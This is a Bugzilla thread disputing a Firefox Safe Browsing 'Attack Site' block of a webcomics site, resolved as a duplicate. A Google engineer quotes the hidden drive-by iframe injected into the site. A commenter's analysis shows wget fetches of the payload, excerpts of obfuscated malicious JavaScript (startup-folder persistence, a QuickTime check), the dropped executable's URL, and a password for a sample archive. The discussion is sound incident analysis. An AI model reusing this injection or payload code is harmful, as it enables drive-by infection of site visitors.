Google "Safe Sites" advisory system is currently reporting false positives.

RESOLVED DUPLICATE of bug 401645

Status

()

Toolkit
Safe Browsing
--
major
RESOLVED DUPLICATE of bug 401645
10 years ago
4 years ago

People

(Reporter: John Barberio, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

10 years ago
User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1

The Google "Safe Sites" advisory system as used in Firefox is currently reporting false positives for "Attack Sites". As an example, http://www.webcomicsnation.com/ is marked as an "Attack Site", but the diagnostics for that page at http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.webcomicsnation.com/ shows zero malware results.

Either the original google reporting system is broken, or the way Firefox intererates those reports is broken.

Marking Critical as it's causing major problems for a lot of people who are having their websites blocked by this for no reason.

Reproducible: Always

Steps to Reproduce:
1. Browse to http://www.webcomicsnation.com/ in firefox set up as default.
Actual Results:  
Access blocked as an "Attack Site".

Expected Results:  
Browsed to the site.
(Reporter)

Comment 1

10 years ago
Note, marking with my own hardware and version tags for now, but this is probably cross-platform.
(Reporter)

Comment 2

10 years ago
Also, my mistake, Google's service is called "Safe Browsing" not "Safe Sites"

Comment 3

10 years ago
(In reply to comment #0)
> The Google "Safe Sites" advisory system as used in Firefox is currently
> reporting false positives for "Attack Sites". As an example,
> http://www.webcomicsnation.com/ is marked as an "Attack Site", but the
> diagnostics for that page at
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.webcomicsnation.com/
> shows zero malware results.
> 
> Either the original google reporting system is broken, or the way Firefox
> intererates those reports is broken.

That page at safebrowsing.clients.google.com (not mozilla !!!) still mentions the site as a suspicious site, even though no malware was found on it during the last 90 days. This means it's still marked by Google, so Firefox will trigger the warning.

I don't see why this is a Firefox bug, it only reports what Google is saying (the database only contains the url, not the details).

What has really happened here, is that the site was probably spreading malware in the past (or the automated Google engine at least though it was). But nobody has ever contested that (there's a link for the webmaster at the bottom), so that might be the reason why it stays marked. As long as someone doesn't take action, it will stay listed, I think. Unless Google will take it off the list automatically after a while.
(In reply to comment #3)
> (...)
> That page at safebrowsing.clients.google.com (not mozilla !!!) still mentions
> the site as a suspicious site, even though no malware was found on it during
> the last 90 days. This means it's still marked by Google, so Firefox will
> trigger the warning.
> 
> I don't see why this is a Firefox bug, it only reports what Google is saying
> (the database only contains the url, not the details).

Firefox is a product of Mozilla or Google?

> What has really happened here, is that the site was probably spreading malware
> in the past (or the automated Google engine at least though it was). But nobody
> has ever contested that (there's a link for the webmaster at the bottom), so
> (...)

It requires usage of Google's "Webmaster Tools" which, in turn, requires creation of Google Account which, in turn, requires acceptation of Google's "Terms of Service" which is a long and uncool document. Not everybody has to want to agree to these terms.

To reporter of the bug: it is a cross-platform issue, I can confirm that the site is blocked also on Linux version of FF.
(Reporter)

Comment 5

10 years ago
1) Is or has http://www.webcomicsnation.com/ ever been an attack site?

No. I'm a regular reader of multiple comics hosted by webcomicsnation. Prior to today, there has been no report from Google that it was an "attack site". The status displayed by google that there has been no history of it hosting malware or other indicators, shows that something has gone wrong here if it's now switched to being an "attack site".

2) Is this a Firefox bug?

If the safebrowsing.clients.google.com is broken, then Firefox should not be using it as an authoritive part of decision making in blocking access to websites.

If Firefox is incorrectly interpreting a reply from Google, then Firefox has a bug in the phishing detection that's generating false positives.

3) Is this a big issue?

Yes. It will either
  a) Scare people into not using a legitimate site, and cause harm to that site's usability.
  b) Induce people into switching phishing protection off.

Correcting a bug in Google's database requires acceptance of Google's "Terms of Service" and creation of a Google Account. I also note that this is illegal under EU data protection and data privicy laws. But have been unable to find the correct person to contact at Google about this.


So,
  a) The incorect behaviour in Firefox should be fixed,
  b) Pressure should be applied to Google to rectify the problems with "Safe Browsing".



(Marking as cross-platform)
OS: Mac OS X → All
Hardware: Macintosh → All
No crash or dataloss = not critical

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.webcomicsnation.com/
from bug 444438#3 "There's diagnostic information only for malware sites." (and not phising sites)
Use http://www.google.com/safebrowsing/report_error/?tpl=mozilla to unblock it

marking as dupe of bug 401645
Severity: critical → normal
Status: UNCONFIRMED → RESOLVED
Last Resolved: 10 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 401645
(Reporter)

Comment 7

10 years ago
Reopening.

The issues raised in this bug are different to the ones of bug 401645.
ie, should Firefox continue using "Safe Browsing" while it's prone to false positives.

Again, the issue here as it currently stands, it either
  a) Scares people into not using a legitimate site, and cause harm to that
site's usability.
  b) Induce people into switching phishing protection off.

Until Google fix the issues at their end, then "Safe Browsing" integration in Firefox should probably be disabled, or replaced with a softer warning.
Status: RESOLVED → UNCONFIRMED
Resolution: DUPLICATE → ---
How do you know that there are more than your one single "false positive" ?
I don't see here that your URL is a false positive, how do you know that ?
I do not see one single confirmed false positive here.

Should people still using Anti-Virus Software because they sometimes report false positives ?
Unless there is a very frequent error with the safebrowsing feature, there is no need to deactivate or modify it. Better safe than unprotected and you can always disable tis feature.


(Reporter)

Comment 9

10 years ago
This is a high trafic, well known, and popular site, that I personaly visit daily. Firefox has only started hiding it behind it's big-warning-page today. The linked to 'diagnostics' from Google say that they haven't found anything wrong with the site, but apparently Firefox says it's on their list of bad sites anyway.
(Reporter)

Comment 10

10 years ago
There is no way to seperately disable the google side of phishing protection, you can only disable it entirely.

If people had virus scanners that would flash big warnings whenever they tried to play a popular well known game, they're switch the virus scanner off, and probably replace it with another one.

Since we're waiting for Google to fix the problems with false positives, and reporting of false positives, it seems wise to me to disable the Safe Browsing integration till then.

(As a side note. To quote from http://www.microsoft.com/windows/windows-vista/features/IE7-anti-phishing.aspx - "You can report any phishing sites or false positives to the Phishing Filter right from your browser."

Anything that makes Firefox more annoying than IE7 is a bad thing.)
Severity: normal → major
>This is a high trafic, well known, and popular site, that I personaly visit
>daily

Yes, that can happen with sites that are well known and are high traffic sites. That is one of the great things that it warns you for sites where you never expect it. The question remains:Why are you sure that it's a false positive ?
There are for example Adds included in that page that could trigger this warning.

Sorry because you had a problem with 1 (one !) single URL and it's still unknown if this is a false positive, it's stupid to post such a statement like "it seems wise to me to disable the Safe Browsing
integration till then."

Because of a possible false positive of one URL which can always happen with automatic tools you want to disable the additional security for the millions of Firefox users ?

BTW: There are popular virus scanner that had a false positive for windows system dlls or another one that caused a BSOD after an update.
(In reply to comment #8)
> How do you know that there are more than your one single "false positive" ?
> I don't see here that your URL is a false positive, how do you know that ?
> I do not see one single confirmed false positive here.
> 
and ... the Website Owner should request a review , see
http://www.stopbadware.org/home/reviewinfo
(In reply to comment #8)
> (...)
> no need to deactivate or modify it. Better safe than unprotected and you can
> always disable tis feature.

"Safe"? Really? IMO it only gives a false sense of security (especially that in FF3.0 database of "bad sites" was not updated in some cases due to bug 434624). BTW - have you read EULA recently? http://www.mozilla.com/en-US/legal/eula/firefox3-en.html : "(...) cannot guarantee that this information is comprehensive and error-free: some risky sites may not be identified, (...)."

There are numerous problems with Google's so-called "safebrowsing": issues with performance (eg. bug 441481), with privacy (bug 368255, reported in Jan 2007 and initially related with FF2, the same problems (actually bigger) are in FF3), and other issues like inability to view source code of a blocked page - bug 435726, or some unexplained changes in source code related with "safebrowsing" done in a hidden (for a long time, not now) bug: bug 360387.
So, it should be disabled by default, and if someone really wants to be "protected" by Google, he/she may enable it. But not the other way around.

(In reply to comment #11)
> (...)
> Because of a possible false positive of one URL which can always happen with
> automatic tools you want to disable the additional security for the millions of
> Firefox users ?

I don't like the idea that one big multinational corporation, that is well known for its corporate paranoia [1] and secrecy (and a hunger for data about Internet users), may unilaterally decide what pages are "bad" and effectively block them.
 
> BTW: There are popular virus scanner that had a false positive for windows
> system dlls or another one that caused a BSOD after an update.
 
FF runs not only on Windows. I use mainly Linux and I don't use a "virus scanner", thank you.

[1] Eg. http://valleywag.com/tech/google/this-nda-never-existed-230407.php
BartZilla: Please stop commenting here, this is bugzilla and not a forum or a general discussion about the phising protection and if you don't like google or the phising protection then disable the feature.

I'm going to mark this bug again as dupe of bug 401645, please do not reopen this bug because this is a blocked site and you are not sure if that's right and bug 401645 is to add a report function. That's the technical resolution for this bug report and that means that this dupe is correct.

Status: UNCONFIRMED → RESOLVED
Last Resolved: 10 years ago10 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 401645
(In reply to comment #14)
> (...) disable the feature.
> (...)

I can do this, but most users probably will not do this. Why? Because they're even unaware that default "malware/phishing protection provider" is Google! It is (deliberately IMO) hidden, see bug 430741.

BTW - there is at least one Linux distribution that disables so-called "safebrowsing" by default in their packages of FF.

Comment 16

10 years ago
It looks like the job that updates the "diagnostic page" is currently stuck. That's unfortunate and we are looking into it. In the mean time, we noticed this page was compromised on (or before) the morning of 7/25. At the very bottom of the page was:

"<iframe src="http://dciman32.com/3332.htm" style="display:none"></iframe>"

This was cleaned up, and subsequently the site was removed from the list once we verified that it was clean.

Let's just say that this iframe did not do good things to your browser.

As for all the people claiming a "google consipracy" / "control by a paranoid mega corporation" - this is an automated system, and we add things when we actually see drive-by downloads happening. It's not some false-positive laden heuristic, it's not a corporate agenda that hates webcomics, if a site is on the list it's because it's infecting users.

To address the multitude of comments about "This is a huge site, I visit it every day, no way it's bad" - what types of sites do you think hackers and evil-doers target? I'll give you a clue - they don't actively target sites that nobody visits. They go out and try to compromise sites that people (like you and millions of others) visit every day. Why? Because it's more bang for their buck. If they can compromise a high-trafficked site, that means they get more infections, which often translates to more bots (and $$$) for them. We see huge sites compromised every day, the fact that a site is high-trafficked does not magically make it somehow immune from hackers, script kiddies, or anyone else exploiting SQL injections, weak passwords, Apache/IIS vulnerabilities, or anything else they can use as an opportunity.

Comment 17

10 years ago
To clarify my last comment - I shouldn't say unequivocally that "if a site is on
the list it's because it's infecting users." as false positives are possible. However, it is safe to say that if a site is on the list, it's because we believe to the best of our knowledge that the site is infecting users. We absolutely do not add anything to the list because of agendas / corporate views / anything of the sort. It is possible that there may be a false positive, which is why I should clarify my previous comment, but this is extremely extremely extremely rare, and I personally can't remember the last time it happened, and was not the case in this particular incident.
(Reporter)

Comment 18

10 years ago
To prevent the assumption of false positives, it might be wise to provide more information on why the site has been flagged on the firefox side. As is, it's hard to work out *why* a site was flagged, and it's very easy to assume it's a false positive. (Especially when you can't view source to check if there really is a problem, and there's nothing showing up otherwise.)
(Reporter)

Comment 19

10 years ago
I couldn't seem to find the use of this iframe when I checked the site.

Comment 20

10 years ago
As I said in my previous comment, "This was cleaned up, and subsequently the site was removed from the list once we verified that it was clean." The iframe is no longer there (hence people are no longer getting infected, hence the site is off the list, working as intended.)
(In reply to comment #16)
> It looks like the job that updates the "diagnostic page" is currently stuck.

Thanks very much for the detailed response, Ian - I think it clarified things here.  Is the update job likely to get stuck again?  I'm sure I don't have to tell you that having accurate information on that report page is the single best way we have to allay fears that a site is falsely reported.

In any event though, it's good to know what actually happened here.

Comment 22

10 years ago
Is it likely to get stuck again? Probably not. It was running out of memory, so we're allocating more memory for the job. Of course, anything can happen ;-)
(In reply to comment #16)
> (...)
> 
> "<iframe src="http://dciman32.com/3332.htm" style="display:none"></iframe>"
> 

Interesting. It seems that domain "dciman32.com" is no longer active, but few days ago (when it worked) I've conducted a small research. So, for the record:

First, I tried to download a "badsite" in question:
1) $ wget -O badsite.html -U 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0' --referer=http://www.webcomicsnation.com/ http://dciman32.com/3332.htm
 - result: 1 byte file; I tried few times, but to no avail; so, let's try with another UA:
2) $ wget -O badsite2.html -U 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' http://dciman32.com/3332.htm
 - success! file badsite2.html has length 11980 bytes; it is some obfuscated script written in JS (it is renamed to badsite2.html.txt in the package); after manual edit it can be converted to harmless /usr/bin/js script that outputs "real" script:
3) $ cp badsite2.html badsite2.js
   $ gvim badsite2.js
   (..editing..)
   $ ./badsite2.js > badsite2-result.html.txt
4) badsite2-result.html.txt is a "final" (but also somewhat obfuscated) script; further analysis is needed, but some preliminary conclusions:
   . it probably downloads and runs some .exe file from http://dciman32.com/_neahfsry/3332dfqjqyqi.exe (saved in the package as 3332dfqjqyqi.exe.bad, this .exe needs further analysis if someone is interested...)
   . script is harmful (probably) only on Windows and MSIE, not on Firefox; for example, it seems that it tries to find "Start Menu\Programs\Startup" in various localizations; here is an excerpt from the script:
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Inicio\\Programas\\Inicio"+st
	fln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menuen Start\\Programmer\\Start"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programma\\'s\\Opstarten"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programy\\Autostart"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Avvio\\Programmi\\Esecuzione automatica"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Kaynnista-valikko\\Ohjelmat\\Kaynnistys"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start Menu\\Programlar\\BASLANGIC"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-meny\\Programmer\\Op
	pstart"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-menyn\\Program\\Autostart"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Iniciar\\Programas\\Iniciar"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+"\\Dokumente und Einstellungen\\"+stau+"Startmenu\\Programme\\Autostart"+stfln;eval(ev2);}catch(e){};};

   . it probably exploits some vulnerability in QuickTime; excerpt from the script:
	var tobjst2=space;var haveqt=false;var chkqt=' <sc'+'ript language="VB'+'script"> \n On Error Resume Next \n Set theObject=CreateObject("QuickTimeCheckObject.QuickTimeCheck.1")

Final conclusions:
Considering the fact that the server has been returning 1-byte length file UNLESS requested from MSIE, it seems that Firefox users were NOT in danger. Moreover, harmful script (probably) only works in MSIE on Windows, and definitely not on Linux (or MacOSX).

You can download a package with all mentioned files here: http://bb.homelinux.org/security/research/files/badbug448103.zip (it is password-protected; the password is "bug448103" without quotes).
Disclaimer: Definitely DO NOT download/unpack this file if you don't know what you are doing. It is provided only for historical/educational/research purposes.

> (...)
> 
> Let's just say that this iframe did not do good things to your browser.

Yeah, if "my browser" is MSIE. However, the page that (allegedly) included this iframe was blocked in _Firefox_.

> As for all the people claiming a "google consipracy" / "control by a paranoid
> mega corporation" - this is an automated system, and we add things when we
> actually see drive-by downloads happening. It's not some false-positive laden
> heuristic, it's not a corporate agenda that hates webcomics, if a site is on
> the list it's because it's infecting users.

Could you _precisely_ describe an algorithm used by Google to decide what pages are "bad"?

> To address the multitude of comments about "This is a huge site, I visit it
> every day, no way it's bad" - what types of sites do you think hackers and
> evil-doers target? I'll give you a clue - they don't actively target sites that
> nobody visits. They go out and try to compromise sites that people (like you
> and millions of others) visit every day. Why? Because it's more bang for their
> buck. If they can compromise a high-trafficked site, that means they get more
> infections, which often translates to more bots (and $$$) for them.

And built-in malware/phishing protection in Firefox translates to _what_ for Google? Because, you see, I don't clearly understand what is the benefit for Google from implementing and maintaining such huge and expensive operation (expensive, because: someone had to write quite complicated piece of software, on client side (ie. in FF) and on server side; someone has to constantly maintain a list of "badsites"; the whole "safebrowsing" thing costs a lot of bandwitdh, especially from the server point of view; etc. etc.). Google is not some charitable institution, so what are the financial benefits for you from this whole thing?

> We see huge
> sites compromised every day, the fact that a site is high-trafficked does not
> magically make it somehow immune from hackers, script kiddies, or anyone else
> exploiting SQL injections, weak passwords, Apache/IIS vulnerabilities, or
> anything else they can use as an opportunity.

You have enumerated some potential vulnerabilities on server side, but malware also has to exploit some vulns on client-side, ie. in the browser. If there is some exploitable vulnerability in Firefox, then the only correct solution is to solve the problem _in Firefox_.
The whole idea with blacklisting some URLs is bad, bad security [1], and I'm pretty sure that Google realizes this (after all, Google employs some security experts like Michał Zalewski (lcamtuf) or Tavis Ormandy [2]...). So, it makes me wonder what is the real purpose of this thing...

[1] See eg. this article by Marcus Ranum: http://www.ranum.com/security/computer_security/editorials/dumb/ "#2) Enumerating Badness".
[2] Here is some post on his blog, related with antivirus industry (this industry also tries to "enumerate badness", and fails): http://my.opera.com/taviso/blog/month-of-mcafee-bugs

(In reply to comment #17)
> To clarify my last comment - I shouldn't say unequivocally that "if a site is
> on
> the list it's because it's infecting users." as false positives are possible.
> However, it is safe to say that if a site is on the list, it's because we
> believe to the best of our knowledge that the site is infecting users. We
> absolutely do not add anything to the list because of agendas / corporate views
> / anything of the sort.

Perhaps not today, but how could you be so sure about the future? You know, all is changing, people, corporations and their attitude etc...

> It is possible that there may be a false positive,
> which is why I should clarify my previous comment, but this is extremely
> extremely extremely rare, and I personally can't remember the last time it
> happened,

See bug 351836 (probably the most funny bug in Bugzilla I've ever seen ;->).

> and was not the case in this particular incident.

Really? It seems that you block pages harmless for Firefox, but only potentially harmful for MSIE...
It DOESN'T MATTER at all if the page is harmless in Firefox at the moment because that can change at every second and this warning blocks also people from opening this page with the IEtab addon.
That such a feature  doesn't give you 100% security should be known because there is no 100% security !
That you could get false positives is expected if you run automatic scanning but there is no need to disable this feature because of that unless this happens frequently.
Bugzilla is not the right place to discuss this, please go to the newsgroups, thanks.


(Assignee)

Updated

4 years ago
Component: Phishing Protection → Phishing Protection
Product: Firefox → Toolkit
You need to log in before you can comment on or make changes to this bug.